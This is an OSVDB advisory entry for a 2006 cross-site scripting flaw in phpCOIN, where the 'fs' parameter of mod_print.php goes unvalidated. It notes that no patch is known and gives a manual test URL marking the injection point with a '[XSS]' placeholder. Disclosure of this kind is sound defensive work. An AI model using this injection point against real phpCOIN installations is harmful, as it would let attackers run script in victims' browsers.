phpCOIN mod_print.php fs Variable XSS

2006-03-28T06:17:35
ID OSVDB:24188
Type osvdb
Reporter r0t(krustevs@googlemail.com)
Modified 2006-03-28T06:17:35

Description

Vulnerability Description

phpCoin contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'fs' variable upon submission to the mod_print.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

phpCoin contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the 'fs' variable upon submission to the mod_print.php script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Manual Testing Notes

/mod_print.php?mod=helpdesk&sb=&so=&fb=&fs=[XSS]

References:

Vendor URL: http://www.phpcoin.com/ Secunia Advisory ID:19419 Related OSVDB ID: 24189 Other Advisory URL: http://pridels.blogspot.com/2006/03/phpcoin-v122-xss-vuln.html FrSIRT Advisory: ADV-2006-1129 CVE-2006-1428 Bugtraq ID: 17279